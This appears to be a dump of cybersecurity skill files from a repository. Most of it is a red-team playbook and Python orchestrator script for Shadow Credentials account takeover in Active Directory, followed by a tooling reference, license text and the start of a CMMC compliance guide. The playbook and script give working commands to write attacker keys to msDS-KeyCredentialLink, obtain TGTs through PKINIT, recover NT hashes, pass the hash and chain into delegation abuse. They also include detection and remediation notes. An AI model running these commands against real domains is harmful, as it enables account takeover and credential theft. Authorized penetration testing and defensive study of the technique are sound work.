   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -0,0 +1,185 @@
 ---
 name: abusing-shadow-credentials-for-privesc
 description: Take over Active Directory user and computer accounts by writing alternate certificate keys to msDS-KeyCredentialLink (Shadow Credentials) with pyWhisker, Whisker, and Certipy, then authenticate via PKINIT.
 domain: cybersecurity
 subdomain: red-teaming
 tags:
 - red-team
 - active-directory
 - shadow-credentials
 - pywhisker
 - certipy
 - pkinit
 - key-credential-link
 - privilege-escalation
 version: '1.0'
 author: mahipal
 license: Apache-2.0
 nist_csf:
 - PR.AA-05
 mitre_attack:
 - T1098.005
 ---
 # Abusing Shadow Credentials for Privilege Escalation
 > **Legal Notice:** This skill is for authorized security testing and educational purposes only. Shadow Credentials grant full takeover of the targeted account. Use only against systems you own or are explicitly authorized in writing to test. Unauthorized access is a crime.
 ## Overview
 The **Shadow Credentials** technique abuses the `msDS-KeyCredentialLink` attribute of Active Directory user and computer objects. This attribute stores raw public keys ("Key Credentials") used by Windows Hello for Business and Azure AD device registration for passwordless certificate-based logon via PKINIT (Public Key Cryptography for Initial Authentication in Kerberos). If an attacker has write permission over a target object's `msDS-KeyCredentialLink` — typically granted by `GenericWrite`, `GenericAll`, `WriteProperty`, or `AddKeyCredentialLink` ACEs surfaced in BloodHound — they can append their own attacker-generated public key. They then request a TGT for the target via PKINIT using the matching private key and recover the target's NT hash, achieving complete account takeover **without resetting the password**, which is far stealthier than a forced password reset.
 The technique was published by Elad Shamir (*"Shadow Credentials: Abusing Key Trust Account Mapping for Account Takeover"*) and implemented in the C# tool **Whisker**. The Python equivalent **pyWhisker** (ShutdownRepo) manipulates the attribute over LDAP, and **Certipy** integrates the entire chain via `certipy shadow auto`. The target environment must support PKINIT and have at least one Domain Controller running Windows Server 2016 or later. Sources: [pyWhisker](https://github.com/ShutdownRepo/pywhisker), [Whisker](https://github.com/eladshamir/Whisker), [The Hacker Recipes — Shadow Credentials](https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials).
 ## When to Use
 - When BloodHound reveals `GenericWrite`/`GenericAll`/`AddKeyCredentialLink` over a higher-value user or computer
 - As a stealthier alternative to `ForceChangePassword` (no password reset = less disruption/alerting)
 - To take over a computer account to chain into Resource-Based Constrained Delegation (RBCD)
 - During red-team operations needing account takeover without locking out the legitimate user
 - For purple-team exercises generating `msDS-KeyCredentialLink` modification telemetry
 ## Prerequisites
 - Authorized engagement scope including AD credential-access techniques
 - Control of a principal with write access to the target's `msDS-KeyCredentialLink`
 - A DC running Windows Server 2016+ with PKINIT enabled (domain functional level supporting Key Trust)
 - Network reachability to LDAP (389/636) and Kerberos (88) on a DC
 - Linux attack host with Python 3.8+; install the tooling:
  ```bash
  # pyWhisker (from source)
  git clone https://github.com/ShutdownRepo/pywhisker
  cd pywhisker && pip install .
  # Certipy (integrated shadow attack)
  pipx install certipy-ad
  # PKINITtools for manual TGT/NT-hash extraction
  git clone https://github.com/dirkjanm/PKINITtools
  ```
 ## Objectives
 - Confirm write access over a target's `msDS-KeyCredentialLink`
 - Generate a key pair and append a Key Credential to the target object
 - Request a TGT for the target via PKINIT using the new key
 - Recover the target's NT hash for pass-the-hash / further movement
 - Clean up the injected Key Credential to restore the object's state
 - Document the ACL path that enabled the attack for remediation
 ## MITRE ATT&CK Mapping
 | ID | Technique | Application in this skill |
 |----|-----------|---------------------------|
 | T1098.005 | Account Manipulation: Device Registration | Writing an attacker-controlled Key Credential (device key) to `msDS-KeyCredentialLink` to register an alternate authentication credential for the target account |
 ## Workflow
 ### Step 1: Confirm the write primitive
 List existing Key Credentials on the target to verify you have the required access. An empty or readable result confirms write access for the `add` step.
 ```bash
 python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
    --target "victim" --action "list"
 ```
 ### Step 2: Add a Shadow Credential with pyWhisker
 Generate a certificate/key pair and write it into the target's `msDS-KeyCredentialLink`. pyWhisker outputs a PFX you control.
 ```bash
 python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
    --target "victim" --action "add" --filename victim_shadow
 # Produces victim_shadow.pfx and prints the PFX password
 ```
 Use Kerberos auth instead of a password if you only hold a ticket:
 ```bash
 python3 pywhisker.py -d "corp.local" -u "attacker" -k --no-pass \
    --target "victim" --action "add" --filename victim_shadow --use-ldaps
 ```
 ### Step 3: Request a TGT via PKINIT
 Use the generated PFX with PKINITtools to obtain a Kerberos TGT for the target.
 ```bash
 python3 PKINITtools/gettgtpkinit.py \
    -cert-pfx victim_shadow.pfx -pfx-pass <PFX_PASSWORD> \
    corp.local/victim victim.ccache
 ```
 ### Step 4: Recover the NT hash
 Extract the target's NT hash from the AS-REP using the session key from Step 3 (`getnthash.py` reads the AS-REP encryption key, displayed by `gettgtpkinit.py`).
 ```bash
 export KRB5CCNAME=victim.ccache
 python3 PKINITtools/getnthash.py -key <AS-REP-KEY-FROM-STEP-3> corp.local/victim
 # Prints the NT hash for 'victim'
 ```
 ### Step 5: One-shot alternative with Certipy
 Certipy's `shadow auto` performs add → PKINIT → dump hash → cleanup automatically, which is ideal for computer-account takeover.
 ```bash
 certipy shadow auto -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -account 'victim'
 # For a computer account, use the sAMAccountName with trailing $
 certipy shadow auto -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -account 'WS01$'
 ```
 ### Step 6: Use the recovered credential
 Authenticate with the NT hash (or the TGT) to continue the engagement.
 ```bash
 # Pass-the-hash with NetExec
 nxc smb 10.0.0.10 -u victim -H <RECOVERED-NT-HASH>
 # Or use the TGT directly
 export KRB5CCNAME=victim.ccache
 nxc smb dc.corp.local -u victim --use-kcache
 ```
 ### Step 7: Chain computer takeover into RBCD (optional)
 When the target is a computer, the recovered key/hash lets you configure Resource-Based Constrained Delegation to impersonate any user to that host.
 ```bash
 # Set RBCD so attacker-controlled SPN can impersonate to WS01$
 impacket-rbcd -delegate-from 'attacker$' -delegate-to 'WS01$' \
    -action write 'corp.local/attacker:Passw0rd!'
 ```
 ### Step 8: Clean up
 Remove the injected Key Credential to restore the object and reduce detection footprint.
 ```bash
 # pyWhisker: remove by device-id (printed during add) or clear all you added
 python3 pywhisker.py -d "corp.local" -u "attacker" -p "Passw0rd!" \
    --target "victim" --action "remove" --device-id <DEVICE-ID>
 # Certipy shadow auto cleans up automatically; otherwise:
 certipy shadow clear -u 'attacker@corp.local' -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -account 'victim'
 ```
 ## Tools and Resources
 | Resource | Purpose | Link |
 |----------|---------|------|
 | pyWhisker | Python LDAP manipulation of msDS-KeyCredentialLink | https://github.com/ShutdownRepo/pywhisker |
 | Whisker | Original C# implementation | https://github.com/eladshamir/Whisker |
 | Certipy | `shadow auto` end-to-end takeover | https://github.com/ly4k/Certipy |
 | PKINITtools | gettgtpkinit / getnthash | https://github.com/dirkjanm/PKINITtools |
 | The Hacker Recipes | Technique walkthrough & defenses | https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials |
 ## Detection and Remediation Notes
 | Area | Guidance |
 |------|----------|
 | Detection | Monitor Windows Security Event ID 5136 (directory object modified) for changes to `msDS-KeyCredentialLink`; alert when a non-AD-Connect/non-Intune principal writes the attribute. |
 | Auditing | Enable directory service object change auditing on user/computer OUs. |
 | Least privilege | Remove unnecessary `GenericWrite`/`GenericAll`/`AddKeyCredentialLink` ACEs (BloodHound `AddKeyCredentialLink` edge). |
 | Mitigation | Where Windows Hello/device registration is unused, restrict who can write Key Credentials and consider tier-0 protected accounts. |
 ## Validation Criteria
 - [ ] Write access over the target's `msDS-KeyCredentialLink` confirmed (`list` succeeded)
 - [ ] Key Credential successfully added (PFX generated)
 - [ ] PKINIT TGT obtained for the target account
 - [ ] Target NT hash recovered and validated against a service
 - [ ] (If computer) RBCD chain or onward movement demonstrated
 - [ ] Injected Key Credential removed / object restored
 - [ ] Enabling ACL path documented with remediation recommendation
@@ -0,0 +1,68 @@
 # Shadow Credentials Tooling Reference
 ## pyWhisker (https://github.com/ShutdownRepo/pywhisker)
 Invocation: `python3 pywhisker.py [auth] --target <obj> --action <action> [opts]`
 | Flag | Meaning |
 |------|---------|
 | `-d DOMAIN` | Target domain (FQDN) |
 | `-u USER` | Controlled username |
 | `-p PASSWORD` | Password |
 | `-k` / `--no-pass` | Kerberos auth (uses KRB5CCNAME) |
 | `-H LM:NT` | Pass-the-hash |
 | `--target NAME` | Target user/computer whose attribute is modified |
 | `--action list` | Enumerate existing Key Credentials |
 | `--action add` | Generate key pair, write Key Credential |
 | `--action remove` | Remove one Key Credential by `--device-id` |
 | `--action clear` | Remove all Key Credentials |
 | `--action info` | Show details of a Key Credential |
 | `--filename NAME` | Output PFX/PEM base name |
 | `--export PEM|PFX` | Output format (default PFX) |
 | `--device-id GUID` | Target device for remove/info |
 | `--dc-ip IP` | Domain Controller IP |
 | `--use-ldaps` | Use LDAPS (636) |
 ### Example
 ```bash
 python3 pywhisker.py -d corp.local -u attacker -p 'Passw0rd!' \
    --target victim --action add --filename victim_shadow
 ```
 ## Certipy `shadow` (https://github.com/ly4k/Certipy)
 | Command | Meaning |
 |---------|---------|
 | `certipy shadow auto` | Add → PKINIT → dump NT hash → cleanup (end to end) |
 | `certipy shadow add` | Add Key Credential only |
 | `certipy shadow list` | List Key Credentials |
 | `certipy shadow clear` | Clear Key Credentials |
 | `certipy shadow info` | Show Key Credential info |
 Key flags: `-u USER@DOMAIN`, `-p PW` / `-hashes :NT` / `-k -no-pass`,
 `-dc-ip IP`, `-account TARGET` (use trailing `$` for computers), `-ns IP`, `-dns-tcp`.
 ### Example
 ```bash
 certipy shadow auto -u attacker@corp.local -p 'Passw0rd!' \
    -dc-ip 10.0.0.100 -account 'WS01$'
 ```
 ## PKINITtools (https://github.com/dirkjanm/PKINITtools)
 | Script | Purpose |
 |--------|---------|
 | `gettgtpkinit.py -cert-pfx FILE -pfx-pass PW DOMAIN/USER out.ccache` | Request TGT via PKINIT; prints AS-REP key |
 | `getnthash.py -key <AS-REP-KEY> DOMAIN/USER` | Recover NT hash (KRB5CCNAME set) |
 ### Example
 ```bash
 python3 gettgtpkinit.py -cert-pfx victim_shadow.pfx -pfx-pass abc123 \
    corp.local/victim victim.ccache
 export KRB5CCNAME=victim.ccache
 python3 getnthash.py -key <AS-REP-KEY> corp.local/victim
 ```
 ## Detection signal
 - Event ID 5136 — modification of `msDS-KeyCredentialLink` (Directory Service Changes auditing).
 - BloodHound edge: `AddKeyCredentialLink`.
@@ -0,0 +1,21 @@
 # Standards Mapping — Abusing Shadow Credentials for Privilege Escalation
 ## MITRE ATT&CK (Enterprise)
 | ID | Name | Rationale |
 |----|------|-----------|
 | T1098.005 | Account Manipulation: Device Registration | Writing an attacker-controlled Key Credential to `msDS-KeyCredentialLink` registers an alternate device/certificate credential for the target, which is exactly the device-registration manipulation this sub-technique describes. |
 Reference: https://attack.mitre.org/techniques/T1098/005/
 Related techniques exercised in the chain:
 - T1649 (Steal or Forge Authentication Certificates) — the PKINIT certificate used to authenticate.
 - T1550.003 / T1558 — using the recovered TGT/hash for movement.
 ## NIST Cybersecurity Framework 2.0
 | ID | Name | Rationale |
 |----|------|-----------|
 | PR.AA-05 | Access permissions, entitlements, and authorizations are defined, managed, and enforced incorporating least privilege and separation of duties | The attack is only possible because of over-permissive ACEs (`GenericWrite`/`GenericAll`/`AddKeyCredentialLink`) on AD objects; remediation is least-privilege enforcement of who may write Key Credentials. |
 Reference: https://csrc.nist.gov/projects/cybersecurity-framework
@@ -0,0 +1,145 @@
 #!/usr/bin/env python3
 """
 shadowcred_takeover.py — Orchestrate a Shadow Credentials account takeover.
 Wraps the real `certipy shadow auto` workflow (and optionally pyWhisker +
 PKINITtools) to add a Key Credential to a target's msDS-KeyCredentialLink,
 recover the NT hash via PKINIT, and clean up. Parses the tool output to surface
 the recovered NT hash and TGT path.
 Authorized use only. Requires write access over the target's
 msDS-KeyCredentialLink and a DC running Windows Server 2016+ with PKINIT.
 Install:
    pipx install certipy-ad
    git clone https://github.com/ShutdownRepo/pywhisker
    git clone https://github.com/dirkjanm/PKINITtools
 Examples:
    python shadowcred_takeover.py certipy -u attacker@corp.local -p 'Passw0rd!' \
        --dc-ip 10.0.0.100 --target 'WS01$'
    python shadowcred_takeover.py pywhisker -d corp.local -u attacker \
        -p 'Passw0rd!' --dc-ip 10.0.0.100 --target victim \
        --pywhisker ./pywhisker/pywhisker.py
 """
 import argparse
 import os
 import re
 import shutil
 import subprocess
 import sys
 def _which_or_die(binary, hint):
    if shutil.which(binary) is None and not os.path.exists(binary):
        sys.exit(f"[!] '{binary}' not found. {hint}")
 def run(cmd, timeout=600):
    print("[*] Running:", " ".join(cmd))
    try:
        proc = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        sys.exit(f"[!] Command timed out after {timeout}s.")
    out = proc.stdout + proc.stderr
    print(out)
    return proc.returncode, out
 def parse_nthash(text):
    """Certipy prints 'Got hash for ...: aad3b...:<NT>'. Extract the NT half."""
    m = re.search(r"[Gg]ot hash for .*?:\s*([0-9a-fA-F]{32}):([0-9a-fA-F]{32})", text)
    if m:
        return m.group(2)
    m = re.search(r"\b[0-9a-fA-F]{32}:([0-9a-fA-F]{32})\b", text)
    return m.group(1) if m else None
 def certipy_flow(args):
    _which_or_die("certipy", "Install with: pipx install certipy-ad")
    cmd = ["certipy", "shadow", "auto",
           "-u", args.user, "-dc-ip", args.dc_ip, "-account", args.target]
    if args.password:
        cmd += ["-p", args.password]
    elif args.hashes:
        cmd += ["-hashes", args.hashes]
    elif args.kerberos:
        cmd += ["-k", "-no-pass"]
    else:
        sys.exit("[!] Provide -p, --hashes, or -k.")
    if args.ns:
        cmd += ["-ns", args.ns, "-dns-tcp"]
    rc, out = run(cmd)
    if rc != 0:
        sys.exit("[!] certipy shadow auto failed.")
    nt = parse_nthash(out)
    if nt:
        print(f"\n[+] Recovered NT hash for {args.target}: {nt}")
        print(f"[+] Reuse it: nxc smb {args.dc_ip} -u {args.target.rstrip('$')} -H {nt}")
    else:
        print("[!] Could not auto-extract NT hash; review output above.")
 def pywhisker_flow(args):
    if not args.pywhisker or not os.path.exists(args.pywhisker):
        sys.exit("[!] --pywhisker must point to pywhisker.py")
    base = "shadow_" + args.target.rstrip("$")
    cmd = ["python3", args.pywhisker, "-d", args.domain, "-u", args.user,
           "--target", args.target, "--action", "add", "--filename", base]
    if args.password:
        cmd += ["-p", args.password]
    elif args.kerberos:
        cmd += ["-k", "--no-pass"]
    else:
        sys.exit("[!] Provide -p or -k.")
    if args.dc_ip:
        cmd += ["--dc-ip", args.dc_ip]
    rc, out = run(cmd)
    if rc != 0:
        sys.exit("[!] pyWhisker add failed.")
    pfx_pass = None
    m = re.search(r"[Pp]assword(?: for the PFX)?:\s*(\S+)", out)
    if m:
        pfx_pass = m.group(1)
    print(f"\n[+] Key Credential added. PFX: {base}.pfx  PFX-pass: {pfx_pass}")
    print("[+] Next, request a TGT with PKINITtools:")
    print(f"    python3 gettgtpkinit.py -cert-pfx {base}.pfx -pfx-pass {pfx_pass} "
          f"{args.domain}/{args.target.rstrip('$')} {base}.ccache")
    print("    export KRB5CCNAME=%s.ccache" % base)
    print(f"    python3 getnthash.py -key <AS-REP-KEY> {args.domain}/{args.target.rstrip('$')}")
    print("[!] Remember to clean up the injected Key Credential when done:")
    print(f"    python3 {args.pywhisker} -d {args.domain} -u {args.user} "
          f"--target {args.target} --action clear")
 def main():
    ap = argparse.ArgumentParser(description="Shadow Credentials takeover orchestrator.")
    sub = ap.add_subparsers(dest="mode", required=True)
    c = sub.add_parser("certipy", help="Use certipy shadow auto (end to end)")
    c.add_argument("-u", "--user", required=True, help="attacker@domain")
    c.add_argument("-p", "--password")
    c.add_argument("--hashes")
    c.add_argument("-k", "--kerberos", action="store_true")
    c.add_argument("--dc-ip", required=True, dest="dc_ip")
    c.add_argument("--target", required=True, help="victim or WS01$")
    c.add_argument("--ns")
    w = sub.add_parser("pywhisker", help="Use pyWhisker add (manual PKINIT after)")
    w.add_argument("-d", "--domain", required=True)
    w.add_argument("-u", "--user", required=True)
    w.add_argument("-p", "--password")
    w.add_argument("-k", "--kerberos", action="store_true")
    w.add_argument("--dc-ip", dest="dc_ip")
    w.add_argument("--target", required=True)
    w.add_argument("--pywhisker", required=True, help="Path to pywhisker.py")
    args = ap.parse_args()
    if args.mode == "certipy":
        certipy_flow(args)
    else:
        pywhisker_flow(args)
 if __name__ == "__main__":
    main()
@@ -0,0 +1,201 @@
                                 Apache License
                           Version 2.0, January 2004
                        http://www.apache.org/licenses/
   TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
   1. Definitions.
      "License" shall mean the terms and conditions for use, reproduction,
      and distribution as defined by Sections 1 through 9 of this document.
      "Licensor" shall mean the copyright owner or entity authorized by
      the copyright owner that is granting the License.
      "Legal Entity" shall mean the union of the acting entity and all
      other entities that control, are controlled by, or are under common
      control with that entity. For the purposes of this definition,
      "control" means (i) the power, direct or indirect, to cause the
      direction or management of such entity, whether by contract or
      otherwise, or (ii) ownership of fifty percent (50%) or more of the
      outstanding shares, or (iii) beneficial ownership of such entity.
      "You" (or "Your") shall mean an individual or Legal Entity
      exercising permissions granted by this License.
      "Source" form shall mean the preferred form for making modifications,
      including but not limited to software source code, documentation
      source, and configuration files.
      "Object" form shall mean any form resulting from mechanical
      transformation or translation of a Source form, including but
      not limited to compiled object code, generated documentation,
      and conversions to other media types.
      "Work" shall mean the work of authorship, whether in Source or
      Object form, made available under the License, as indicated by a
      copyright notice that is included in or attached to the work
      (an example is provided in the Appendix below).
      "Derivative Works" shall mean any work, whether in Source or Object
      form, that is based on (or derived from) the Work and for which the
      editorial revisions, annotations, elaborations, or other modifications
      represent, as a whole, an original work of authorship. For the purposes
      of this License, Derivative Works shall not include works that remain
      separable from, or merely link (or bind by name) to the interfaces of,
      the Work and Derivative Works thereof.
      "Contribution" shall mean any work of authorship, including
      the original version of the Work and any modifications or additions
      to that Work or Derivative Works thereof, that is intentionally
      submitted to the Licensor for inclusion in the Work by the copyright owner
      or by an individual or Legal Entity authorized to submit on behalf of
      the copyright owner. For the purposes of this definition, "submitted"
      means any form of electronic, verbal, or written communication sent
      to the Licensor or its representatives, including but not limited to
      communication on electronic mailing lists, source code control systems,
      and issue tracking systems that are managed by, or on behalf of, the
      Licensor for the purpose of discussing and improving the Work, but
      excluding communication that is conspicuously marked or otherwise
      designated in writing by the copyright owner as "Not a Contribution."
      "Contributor" shall mean Licensor and any individual or Legal Entity
      on behalf of whom a Contribution has been received by the Licensor and
      subsequently incorporated within the Work.
   2. Grant of Copyright License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      copyright license to reproduce, prepare Derivative Works of,
      publicly display, publicly perform, sublicense, and distribute the
      Work and such Derivative Works in Source or Object form.
   3. Grant of Patent License. Subject to the terms and conditions of
      this License, each Contributor hereby grants to You a perpetual,
      worldwide, non-exclusive, no-charge, royalty-free, irrevocable
      (except as stated in this section) patent license to make, have made,
      use, offer to sell, sell, import, and otherwise transfer the Work,
      where such license applies only to those patent claims licensable
      by such Contributor that are necessarily infringed by their
      Contribution(s) alone or by combination of their Contribution(s)
      with the Work to which such Contribution(s) was submitted. If You
      institute patent litigation against any entity (including a
      cross-claim or counterclaim in a lawsuit) alleging that the Work
      or a Contribution incorporated within the Work constitutes direct
      or contributory patent infringement, then any patent licenses
      granted to You under this License for that Work shall terminate
      as of the date such litigation is filed.
   4. Redistribution. You may reproduce and distribute copies of the
      Work or Derivative Works thereof in any medium, with or without
      modifications, and in Source or Object form, provided that You
      meet the following conditions:
      (a) You must give any other recipients of the Work or
          Derivative Works a copy of this License; and
      (b) You must cause any modified files to carry prominent notices
          stating that You changed the files; and
      (c) You must retain, in the Source form of any Derivative Works
          that You distribute, all copyright, patent, trademark, and
          attribution notices from the Source form of the Work,
          excluding those notices that do not pertain to any part of
          the Derivative Works; and
      (d) If the Work includes a "NOTICE" text file as part of its
          distribution, then any Derivative Works that You distribute must
          include a readable copy of the attribution notices contained
          within such NOTICE file, excluding any notices that do not
          pertain to any part of the Derivative Works, in at least one
          of the following places: within a NOTICE text file distributed
          as part of the Derivative Works; within the Source form or
          documentation, if provided along with the Derivative Works; or,
          within a display generated by the Derivative Works, if and
          wherever such third-party notices normally appear. The contents
          of the NOTICE file are for informational purposes only and
          do not modify the License. You may add Your own attribution
          notices within Derivative Works that You distribute, alongside
          or as an addendum to the NOTICE text from the Work, provided
          that such additional attribution notices cannot be construed
          as modifying the License.
      You may add Your own copyright statement to Your modifications and
      may provide additional or different license terms and conditions
      for use, reproduction, or distribution of Your modifications, or
      for any such Derivative Works as a whole, provided Your use,
      reproduction, and distribution of the Work otherwise complies with
      the conditions stated in this License.
   5. Submission of Contributions. Unless You explicitly state otherwise,
      any Contribution intentionally submitted for inclusion in the Work
      by You to the Licensor shall be under the terms and conditions of
      this License, without any additional terms or conditions.
      Notwithstanding the above, nothing herein shall supersede or modify
      the terms of any separate license agreement you may have executed
      with Licensor regarding such Contributions.
   6. Trademarks. This License does not grant permission to use the trade
      names, trademarks, service marks, or product names of the Licensor,
      except as required for reasonable and customary use in describing the
      origin of the Work and reproducing the content of the NOTICE file.
   7. Disclaimer of Warranty. Unless required by applicable law or
      agreed to in writing, Licensor provides the Work (and each
      Contributor provides its Contributions) on an "AS IS" BASIS,
      WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
      implied, including, without limitation, any warranties or conditions
      of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
      PARTICULAR PURPOSE. You are solely responsible for determining the
      appropriateness of using or redistributing the Work and assume any
      risks associated with Your exercise of permissions under this License.
   8. Limitation of Liability. In no event and under no legal theory,
      whether in tort (including negligence), contract, or otherwise,
      unless required by applicable law (such as deliberate and grossly
      negligent acts) or agreed to in writing, shall any Contributor be
      liable to You for damages, including any direct, indirect, special,
      incidental, or consequential damages of any character arising as a
      result of this License or out of the use or inability to use the
      Work (including but not limited to damages for loss of goodwill,
      work stoppage, computer failure or malfunction, or any and all
      other commercial damages or losses), even if such Contributor
      has been advised of the possibility of such damages.
   9. Accepting Warranty or Additional Liability. While redistributing
      the Work or Derivative Works thereof, You may choose to offer,
      and charge a fee for, acceptance of support, warranty, indemnity,
      or other liability obligations and/or rights consistent with this
      License. However, in accepting such obligations, You may act only
      on Your own behalf and on Your sole responsibility, not on behalf
      of any other Contributor, and only if You agree to indemnify,
      defend, and hold each Contributor harmless for any liability
      incurred by, or claims asserted against, such Contributor by reason
      of your accepting any such warranty or additional liability.
   END OF TERMS AND CONDITIONS
   APPENDIX: How to apply the Apache License to your work.
      To apply the Apache License to your work, attach the following
      boilerplate notice, with the fields enclosed by brackets "[]"
      replaced with your own identifying information. (Don't include
      the brackets!)  The text should be enclosed in the appropriate
      comment syntax for the file format. Please do not remove or change
      the license header comment from a contributed file except when
      necessary.
   Copyright 2026 mukul975
   Licensed under the Apache License, Version 2.0 (the "License");
   you may not use this file except in compliance with the License.
   You may obtain a copy of the License at
       http://www.apache.org/licenses/LICENSE-2.0
   Unless required by applicable law or agreed to in writing, software
   distributed under the License is distributed on an "AS IS" BASIS,
   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
   See the License for the specific language governing permissions and
   limitations under the License.
@@ -0,0 +1,142 @@
 ---
 name: achieving-cmmc-level-2-compliance
 description: >-
  Prepare a defense-contractor environment for CMMC Level 2 certification: scope CUI
  and FCI, implement the 110 NIST SP 800-171 Rev 2 security requirements across 14
  families, compute the SPRS score with the DoD Assessment Methodology, manage a
  compliant POA&M, and ready the organization for a C3PAO assessment. Use when an
  organization handles Controlled Unclassified Information (CUI) under a DoD contract,
  when a contract carries DFARS clause 252.204-7012/7019/7020/7021, when preparing for
  or responding to a CMMC assessment, when computing or improving an SPRS score, when
  building a System Security Plan or POA&M for 800-171, or when scoping which systems
  are in the CUI boundary. Keywords: CMMC, CMMC Level 2, NIST 800-171, SP 800-171 Rev 2,
  CUI, FCI, SPRS, DFARS 7012, C3PAO, POA&M, System Security Plan, DoD Assessment
  Methodology, 110 controls, defense industrial base, DIB, FedRAMP equivalency.
 domain: cybersecurity
 subdomain: compliance-governance
 tags:
 - cmmc
 - nist-800-171
 - cui
 - sprs
 - dfars
 - c3pao
 - poam
 - compliance
 - governance
 - defense-industrial-base
 version: "1.0"
 author: andrewibrah
 license: Apache-2.0
 nist_csf:
 - GV.OC-03
 - GV.SC-01
 - ID.AM-08
 - ID.RA-05
 - PR.AA-01
 - PR.DS-01
 mitre_attack:
 - T1078
 - T1190
 - T1041
 - T1048
 - T1567
 ---
 # Achieving CMMC Level 2 Compliance
 ## When to Use
 - When an organization in the **Defense Industrial Base (DIB)** stores, processes, or transmits **Controlled Unclassified Information (CUI)** under a DoD contract.
 - When a contract includes **DFARS 252.204-7012** (safeguarding/incident reporting), **-7019/-7020** (NIST 800-171 self-assessment + SPRS), or the new **-7021** (CMMC requirement).
 - When preparing for a **C3PAO** third-party assessment or a DoD-led assessment.
 - When you must **compute, post, or improve an SPRS score** based on the NIST SP 800-171 DoD Assessment Methodology.
 - When authoring or remediating a **System Security Plan (SSP)** and **POA&M** for the 110 requirements.
 - When **scoping** which assets fall inside the CUI/FCI boundary (CUI assets, security-protection assets, contractor risk-managed assets, out-of-scope).
 ## Prerequisites
 - Knowledge of **which contracts carry CUI** and the CUI categories involved (check the contract and the DoD CUI Registry).
 - An asset inventory and network diagram so you can define the **CMMC assessment scope** before assessing controls.
 - The **NIST SP 800-171 Rev 2** requirements and the **DoD Assessment Methodology** scoring weights.
 - A documented **SSP** (its absence is itself a failed requirement — 3.12.4).
 - Identification of any **External Service Providers (ESPs)** / cloud services touching CUI, and whether they meet **FedRAMP Moderate (or equivalency)**.
 ## Workflow
 ### 1. Determine applicability and CUI categories
 Confirm the contract requires CMMC Level 2 (CUI present, not just FCI). FCI-only contracts are **Level 1** (the 15 FAR 52.204-21 requirements). Identify CUI categories from the contract and the DoD CUI Registry.
 ### 2. Scope the environment
 Classify every asset into one of the CMMC scoping categories:
 - **CUI Assets** — process/store/transmit CUI (in scope, assessed against all applicable controls).
 - **Security Protection Assets** — provide security to the CUI environment (in scope).
 - **Contractor Risk Managed Assets** — could but are not intended to handle CUI; managed by policy.
 - **Specialized Assets** (IoT/OT, GFE, test equipment) — documented, limited assessment.
 - **Out-of-Scope** — physically/logically isolated from CUI.
 Minimize scope deliberately — a smaller, well-segmented CUI enclave is far cheaper to certify than a flat network.
 ### 3. Implement the 110 requirements (NIST SP 800-171 Rev 2)
 Work the **14 families** (3.1–3.14). For each requirement, implement, then write the **how** in the SSP. High-leverage early wins: MFA (3.5.3), FIPS-validated cryptography (3.13.11), audit logging (3.3.x), access control + least privilege (3.1.x), and incident response (3.6.x).
 ### 4. Score with the DoD Assessment Methodology (SPRS)
 Start at **110** and subtract the weighted value (**1, 3, or 5 points**) of each **unmet** requirement; partial credit applies to a small number of controls (e.g., MFA, FIPS crypto). The result is the **SPRS score** (maximum 110; the methodology floor is −203). Post the score, the SSP date, and the assessment scope to **SPRS** (or eMASS for higher assessments).
 ### 5. Build a compliant POA&M
 Document every unmet requirement with owner, remediation, and milestone. **Constraints under the CMMC rule:** a **Conditional** status requires a score of at least **80%** (≥ 88 of 110), only **POA&M-eligible** requirements may be deferred (the highest-weighted security requirements must be fully met — verify eligibility against 32 CFR Part 170), and all POA&M items must be **closed within 180 days** to convert Conditional → **Final**.
 ### 6. Assess (self or C3PAO)
 - **Level 1** and a subset of Level 2 = annual **self-assessment** with an affirmation in SPRS.
 - **Level 2 (most CUI contracts)** = triennial **C3PAO** certification assessment.
 - **Level 3** = DoD (DIBCAC) assessment on top of Level 2, adding SP 800-172 enhanced requirements.
 Assessors evaluate each objective as **MET / NOT MET / N/A** with evidence (examine/interview/test). A senior official files the **annual affirmation** of continued compliance.
 ### 7. Maintain certification
